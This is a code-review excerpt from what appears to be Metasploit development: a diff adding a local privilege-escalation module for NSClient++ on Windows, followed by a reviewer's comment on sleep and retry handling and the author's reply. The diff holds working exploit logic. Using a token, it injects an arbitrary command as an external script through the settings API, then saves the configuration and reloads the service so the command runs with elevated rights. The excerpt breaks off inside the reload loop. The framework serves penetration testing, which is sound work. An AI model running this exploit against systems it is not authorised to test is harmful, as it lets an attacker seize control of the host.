modules/exploits/windows/local/nscp_pe.rb

```diff
@@ -0,0 +1,239 @@
+            'BZYO',       # POC on www.exploit-db.com
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '48360'],
+            ['EDB', '46802']
+          ],
+        'Platform' => %w[windows],
+        'Arch' => [ARCH_X64],
+        'Targets' =>
+          [
+            [
+              'Windows',
+              {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :windows_powershell
+              }
+            ]
+          ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'DefaultOptions' => { 'SSL' => true, 'RHOSTS' => 'DOESNT_MATTER', 'RPORT' => 8443 }
+      )
+    )
+
+    register_options [
+      OptString.new('FILE', [true, 'Config file of NSClient', 'C:\\Program Files\\NSClient++\\nsclient.ini'])
+    ]
+  end
+
+  def rhost
+    session.session_host
+  end
+
+  def configure_payload(token, cmd, key)
+    print_status('Configuring Script with Specified Payload . . .')
+
+    plugin_id = rand(1..10000).to_s
+
+    node = {
+      'path' => '/settings/external scripts/scripts',
+      'key' => key
+    }
+    value = { 'string_data' => cmd }
+    update = { 'node' => node, 'value' => value }
+    payload = [
+      {
+        'plugin_id' => plugin_id,
+        'update' => update
+      }
+    ]
+    json_data = { 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+
+    if !(r&.body.to_s.include? 'STATUS_OK')
+      print_error('Error configuring payload. Hit error at: ' + endpoint)
+    end
+
+    print_status('Added External Script (name: ' + key + ')')
+    sleep(3)
+    print_status('Saving Configuration . . .')
+    header = { 'version' => '1' }
+    payload = [ { 'plugin_id' => plugin_id, 'control' => { 'command' => 'SAVE' } } ]
+    json_data = { 'header' => header, 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+  end
+
+  def reload_config(token)
+    print_status('Reloading Application . . .')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/core/reload')
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        sleep(2)
```

Comment:
You may wish to give the user control over the sleep and the loop count.  We also have some examples of exponential backoff, or long-term maybe move a wait/backoff/retry cycle into the http mixin.

Reply:
Hello ! I am not sure to understand the last thing you said about "moving a wait/backoff/retry cycle into the http mixin".
And about the first suggestion, yes I could add an option to allow the user to specify the waiting time.